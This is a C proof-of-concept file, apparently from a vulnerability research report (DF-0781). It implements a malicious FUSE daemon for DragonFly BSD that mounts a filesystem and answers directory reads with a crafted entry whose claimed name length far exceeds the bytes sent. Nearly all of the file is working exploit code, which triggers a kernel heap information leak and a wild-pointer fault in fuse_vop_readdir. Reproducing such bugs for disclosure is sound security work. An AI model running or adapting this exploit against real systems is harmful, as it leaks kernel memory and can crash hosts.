DF-0781 / evil_daemon.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 | /* * DF-0781 โ malicious FUSE daemon. * * Reproduces the kernel heap info leak (and adjacent wild-pointer fault) in * fuse_vop_readdir() (sys/vfs/fuse/fuse_vnops.c:1080) triggered when a FUSE * daemon returns a FUSE_READDIR reply whose fuse_dirent.namelen is LARGER * than the actual name bytes that follow in the reply buffer. * * Root cause (confirmed at source): * * fuse_vop_readdir() only checks `len < FUSE_NAME_OFFSET` (i.e. that 24 * bytes remain for the dirent header), NOT `FUSE_NAME_OFFSET + namelen * <= len`. It then unconditionally passes fde->namelen (a daemon-chosen * uint32, truncated to uint16 d_namlen) and fde->name to vop_write_dirent, * which does: * * bcopy(d_name, dp->d_name, d_namlen); // vfs_subr.c:2576 * * reading d_namlen bytes from fde->name (a pointer into the daemon reply * buffer) regardless of how many name bytes actually exist. If the * daemon's reply buffer is smaller than fde->name + d_namlen, the bcopy * reads past the end of the kmalloc'd M_FUSE_BUF reply buffer into * adjacent kernel heap, and the bytes are then uiomove'd to the user's * getdents buffer โ a kernel heap info leak. * * On the next loop iteration, `len -= freclen` (both unsigned size_t) * underflows to ~SIZE_MAX when freclen > len, and `buf += freclen` * advances to a wild pointer; the next `(struct fuse_dirent*)buf` deref * then reads garbage (or faults). * * The existing fuse_audit_length() only checks `len <= fri->size` * (fuse_util.c:132) โ it does NOT validate fde->namelen against the actual * dirent bytes, so the audit passes and the IPC completes normally. * * Trigger threat model: root-only on default DragonFly (kldload + /dev/fuse * perms + mount cap check); see VERDICT.md "Threat model". The readdir * consumer can be the unprivileged user maxx once mounted. * * Build: cc -O0 -g -o evil_daemon evil_daemon.c * Run: ./evil_daemon /mnt/fuse (as root; opens /dev/fuse, mounts) */ #include <sys/param.h> #include <sys/mount.h> #include <sys/uio.h> #include <sys/stat.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <err.h> #include <errno.h> /* ---- FUSE ABI (mirrors sys/vfs/fuse/fuse_abi.h, packed to 8-byte) ---- */ #define FUSE_KERNEL_VERSION 7 #define FUSE_KERNEL_MINOR_VERSION 28 #define FUSE_ROOT_ID 1 #define FUSE_LOOKUP 1 #define FUSE_FORGET 2 #define FUSE_GETATTR 3 #define FUSE_SETATTR 4 #define FUSE_READLINK 5 #define FUSE_OPEN 14 #define FUSE_READ 15 #define FUSE_WRITE 16 #define FUSE_STATFS 17 #define FUSE_RELEASE 18 #define FUSE_FSYNC 20 #define FUSE_FLUSH 25 #define FUSE_INIT 26 #define FUSE_OPENDIR 27 #define FUSE_READDIR 28 #define FUSE_RELEASEDIR 29 #define FUSE_ACCESS 34 struct fuse_in_header { uint32_t len; uint32_t opcode; uint64_t unique; uint64_t nodeid; uint32_t uid; uint32_t gid; uint32_t pid; uint32_t padding; }; struct fuse_out_header { uint32_t len; int32_t error; uint64_t unique; }; struct fuse_init_in { uint32_t major, minor, max_readahead, flags; }; struct fuse_init_out { uint32_t major, minor, max_readahead, flags; uint16_t max_background, congestion_threshold; uint32_t max_write, time_gran; uint16_t max_pages, padding; uint32_t unused[8]; }; struct fuse_attr { uint64_t ino, size, blocks, atime, mtime, ctime; uint32_t atimensec, mtimensec, ctimensec, mode, nlink, uid, gid, rdev, blksize, padding; }; struct fuse_attr_out { uint64_t attr_valid; uint32_t attr_valid_nsec; uint32_t dummy; struct fuse_attr attr; }; struct fuse_entry_out { uint64_t nodeid, generation, entry_valid, attr_valid; uint32_t entry_valid_nsec, attr_valid_nsec; struct fuse_attr attr; }; struct fuse_getattr_in { uint32_t getattr_flags, dummy; uint64_t fh; }; struct fuse_open_in { uint32_t flags, unused; }; struct fuse_open_out { uint64_t fh; uint32_t open_flags, padding; }; struct fuse_read_in { uint64_t fh, offset; uint32_t size, read_flags; uint64_t lock_owner; uint32_t flags, padding; }; struct fuse_kstatfs { uint64_t blocks, bfree, bavail, files, ffree; uint32_t bsize, namelen, frsize, padding, spare[6]; }; struct fuse_statfs_out { struct fuse_kstatfs st; }; struct fuse_access_in { uint32_t mask, padding; }; /* * fuse_dirent as the kernel sees it (sys/vfs/fuse/fuse_abi.h:733). * sizeof = 24 (FUSE_NAME_OFFSET); name[] follows. */ struct fuse_dirent { uint64_t ino; uint64_t off; uint32_t namelen; uint32_t type; char name[]; }; #define DAEMON_NAME_OFFSET 24 /* * The lie: claim the name is FAKE_NAMELEN bytes long, but only emit * ACTUAL_NAME_BYTES of actual name data in the reply. The kernel's bcopy * will therefore read FAKE_NAMELEN - ACTUAL_NAME_BYTES bytes past the end * of the reply buffer = kernel heap leak. * * FAKE_NAMELEN must fit in uint16_t (max 65535) since vop_write_dirent * truncates fde->namelen to uint16 d_namlen, and must be small enough that * _DIRENT_RECLEN(FAKE_NAMELEN) <= user getdents buffer (we use 64 KB). * * 32000 keeps _DIRENT_RECLEN well under 32 KB so the user buffer (64 KB) * always has room; a single iteration's bcopy then traverses many slab * chunks (well past the 64-byte reply buffer + its slab page), maximising * the chance of catching non-zero kernel heap. */ #define FAKE_NAMELEN 32000 /* claimed name length (lie) */ #define ACTUAL_NAME_BYTES 8 /* real bytes following header */ static const char *DEV = "/dev/fuse"; /* send a reply: out_header + optional data. */ static void reply(int fd, uint64_t unique, int error, const void *data, size_t datalen) { struct fuse_out_header oh; struct iovec iov[2]; oh.len = sizeof(oh) + datalen; oh.error = error; oh.unique = unique; iov[0].iov_base = &oh; iov[0].iov_len = sizeof(oh); iov[1].iov_base = (void *)(uintptr_t)data; iov[1].iov_len = datalen; if (writev(fd, iov, data ? 2 : 1) < 0) warn("daemon writev failed"); } /* build a fuse_attr for a given inode. */ static void make_attr(struct fuse_attr *a, uint64_t ino, uint32_t mode, uint64_t size) { memset(a, 0, sizeof(*a)); a->ino = ino; a->size = size; a->blocks = (size + 511) / 512; a->atime = a->mtime = a->ctime = 1000000000ULL; a->mode = mode; a->nlink = 1; a->uid = 0; a->gid = 0; a->blksize = 4096; } static void reply_getattr(int fd, uint64_t unique, uint64_t nodeid) { struct fuse_attr_out ao; memset(&ao, 0, sizeof(ao)); ao.attr_valid = 3600; if (nodeid == FUSE_ROOT_ID) make_attr(&ao.attr, FUSE_ROOT_ID, S_IFDIR | 0755, 0); else make_attr(&ao.attr, nodeid, S_IFREG | 0644, 0); reply(fd, unique, 0, &ao, sizeof(ao)); } static void reply_lookup(int fd, uint64_t unique, uint64_t ino, uint32_t mode) { struct fuse_entry_out eo; memset(&eo, 0, sizeof(eo)); eo.nodeid = ino; eo.generation = 1; eo.entry_valid = eo.attr_valid = 3600; make_attr(&eo.attr, ino, mode, 0); reply(fd, unique, 0, &eo, sizeof(eo)); } /* * Malicious FUSE_READDIR reply: emit ONE dirent whose namelen claims * FAKE_NAMELEN bytes but only ACTUAL_NAME_BYTES of name data are present. * * Reply payload layout: * [fuse_out_header 16][fuse_dirent header 24][name ACTUAL_NAME_BYTES] * Total reply length = 16 + 24 + ACTUAL_NAME_BYTES. * * The kernel's vop_write_dirent will bcopy(d_name, dp->d_name, FAKE_NAMELEN) * which reads FAKE_NAMELEN bytes from a region only ACTUAL_NAME_BYTES wide, * leaking FAKE_NAMELEN - ACTUAL_NAME_BYTES bytes of adjacent kernel heap. */ static void reply_readdir_leak(int fd, uint64_t unique) { unsigned char pkt[sizeof(struct fuse_out_header) + DAEMON_NAME_OFFSET + ACTUAL_NAME_BYTES]; struct fuse_out_header *oh; struct fuse_dirent *fde; size_t payload = DAEMON_NAME_OFFSET + ACTUAL_NAME_BYTES; memset(pkt, 0, sizeof(pkt)); oh = (struct fuse_out_header *)pkt; oh->len = sizeof(*oh) + payload; oh->error = 0; oh->unique = unique; fde = (struct fuse_dirent *)(pkt + sizeof(*oh)); fde->ino = 2; /* visible inode */ fde->off = 0; fde->namelen = FAKE_NAMELEN; /* the lie */ fde->type = 8; /* DT_REG */ memcpy(fde->name, "ABCDEFGH", ACTUAL_NAME_BYTES); fprintf(stderr, "[daemon] READDIR node=root REPLYING %u-byte pkt with " "dirent.namelen=%u (only %d real name bytes) " "-> kernel will bcopy %u bytes from %d-byte name = LEAK %d bytes " "of kernel heap past reply buffer\n", oh->len, FAKE_NAMELEN, ACTUAL_NAME_BYTES, FAKE_NAMELEN, ACTUAL_NAME_BYTES, FAKE_NAMELEN - ACTUAL_NAME_BYTES); if (write(fd, pkt, sizeof(pkt)) != (ssize_t)sizeof(pkt)) warn("daemon readdir write failed"); } /* the daemon serve loop. */ static void serve(int fd) { unsigned char buf[65536]; fprintf(stderr, "[daemon] serving on fd %d\n", fd); for (;;) { ssize_t n = read(fd, buf, sizeof(buf)); if (n < 0) { if (errno == EINTR) continue; warn("daemon read failed"); return; } if (n == 0) { fprintf(stderr, "[daemon] EOF on device\n"); return; } if ((size_t)n < sizeof(struct fuse_in_header)) { fprintf(stderr, "[daemon] short read %zd\n", n); continue; } struct fuse_in_header *ih = (struct fuse_in_header *)buf; void *in = buf + sizeof(*ih); uint64_t uniq = ih->unique; switch (ih->opcode) { case FUSE_INIT: { struct fuse_init_in *fi = in; struct fuse_init_out fo; memset(&fo, 0, sizeof(fo)); fo.major = FUSE_KERNEL_VERSION; fo.minor = (fi->minor < 28) ? fi->minor : 28; fo.max_readahead = 4096; fo.flags = 0; fo.max_write = 1 << 20; fprintf(stderr, "[daemon] INIT major=%u minor=%u -> reply\n", fi->major, fi->minor); reply(fd, uniq, 0, &fo, sizeof(fo)); break; } case FUSE_STATFS: { struct fuse_statfs_out so; memset(&so, 0, sizeof(so)); so.st.blocks = 1024; so.st.bfree = 512; so.st.bavail = 512; so.st.files = 16; so.st.ffree = 8; so.st.bsize = 4096; so.st.namelen = 255; so.st.frsize = 4096; reply(fd, uniq, 0, &so, sizeof(so)); break; } case FUSE_GETATTR: reply_getattr(fd, uniq, ih->nodeid); break; case FUSE_LOOKUP: /* any lookup under root returns a regular file at inode 2 */ reply_lookup(fd, uniq, 2, S_IFREG | 0644); break; case FUSE_ACCESS: reply(fd, uniq, 0, NULL, 0); break; case FUSE_OPENDIR: { struct fuse_open_out oo; memset(&oo, 0, sizeof(oo)); oo.fh = FUSE_ROOT_ID; reply(fd, uniq, 0, &oo, sizeof(oo)); break; } case FUSE_OPEN: { struct fuse_open_out oo; memset(&oo, 0, sizeof(oo)); oo.fh = 2; reply(fd, uniq, 0, &oo, sizeof(oo)); break; } case FUSE_READDIR: { /* malicious reply: oversized namelen, short actual data */ reply_readdir_leak(fd, uniq); break; } case FUSE_FORGET: /* no reply */ break; case FUSE_FLUSH: case FUSE_RELEASE: case FUSE_RELEASEDIR: case FUSE_FSYNC: case FUSE_SETATTR: case FUSE_READLINK: case FUSE_READ: case FUSE_WRITE: reply(fd, uniq, 0, NULL, 0); break; default: fprintf(stderr, "[daemon] unhandled opcode %u\n", ih->opcode); reply(fd, uniq, -ENOSYS, NULL, 0); break; } } } int main(int argc, char **argv) { const char *mnt; int fd, status; pid_t pid; if (argc != 2) { fprintf(stderr, "usage: %s mountpoint\n", argv[0]); return 2; } mnt = argv[1]; setvbuf(stderr, NULL, _IOLBF, 0); /* survive kernel panic in the log */ fd = open(DEV, O_RDWR); if (fd < 0) err(1, "open %s", DEV); fprintf(stderr, "[main] opened %s fd=%d\n", DEV, fd); mkdir(mnt, 0755); pid = fork(); if (pid < 0) err(1, "fork"); if (pid == 0) { /* daemon child: serve requests (holds the fd, keeps mount alive). */ serve(fd); _exit(0); } /* parent: perform the mount using the open fd. Kernel ships FUSE_INIT * to the queue; the daemon child answers it; this mount(2) returns. */ sleep(1); /* let daemon enter read() */ struct fuse_mount_info { int flags; int fd; int max_read; const char *subtype; const char *from; } args; memset(&args, 0, sizeof(args)); args.flags = 0; args.fd = fd; args.max_read = 0; args.subtype = NULL; args.from = DEV; if (mount("fuse", mnt, 0, &args) < 0) err(1, "mount fuse on %s", mnt); fprintf(stderr, "[main] mounted fuse on %s (daemon pid %d)\n", mnt, pid); fprintf(stderr, "[main] now run: ./read_trigger %s (triggers leak)\n", mnt); /* keep parent alive so the daemon child isn't reparented/killed before * the trigger; wait for it. */ waitpid(pid, &status, 0); fprintf(stderr, "[main] daemon exited status=%d\n", status); return 0; } |